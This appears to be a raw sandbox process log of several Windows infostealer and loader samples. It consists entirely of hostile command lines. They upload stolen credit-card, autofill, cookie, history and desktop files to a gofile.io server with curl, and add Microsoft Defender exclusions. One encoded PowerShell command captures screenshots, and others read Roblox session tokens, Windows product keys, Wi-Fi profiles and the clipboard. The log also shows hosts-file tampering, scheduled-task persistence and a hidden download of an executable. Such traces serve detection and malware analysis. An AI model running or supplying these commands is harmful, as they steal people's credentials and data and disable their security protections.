REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ ‏ .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ ‏ .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\BWCStartMSI.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\BWCStartMSI.exe"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\elshcmw0\elshcmw0.cmdline"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7502.tmp" "c:\Users\Admin\AppData\Local\Temp\elshcmw0\CSC31DB2BB7496F410EABB08B34CCA1F31B.TMP"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\VipToolMeta.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\VipToolMeta.exe"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe

"C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A2F2E84C68F849DA022261FEA98F23E7 C

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe" & rd /s /q "C:\ProgramData\AECAECFCAAEB" & exit

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding BA52B7C8813C1EA74300800309F5AC18

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI8290.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240813437 2 CustomActions!CustomActions.CustomActions.StartApp

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe

"C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI89A6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240814562 8 CustomActions!CustomActions.CustomActions.InstallPing

C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe

"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupInitialize.xltm" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Desktop/BackupInitialize.xltm" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 9100"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\taskkill.exe

taskkill /F /PID 9100

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 9100"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 9100

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupShow.dxf" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Desktop/BackupShow.dxf" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19562\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\AddxZ.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI19562\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI19562\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\AddxZ.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'freedom.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows.exe'

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\t.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\t.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows" /tr "C:\Users\Admin\Windows.exe"

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe'

C:\Users\Admin\Desktop\4363463463464363463463463\Files\jgesfyhjsefa.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\jgesfyhjsefa.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\XSploitLauncher.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\XSploitLauncher.exe"

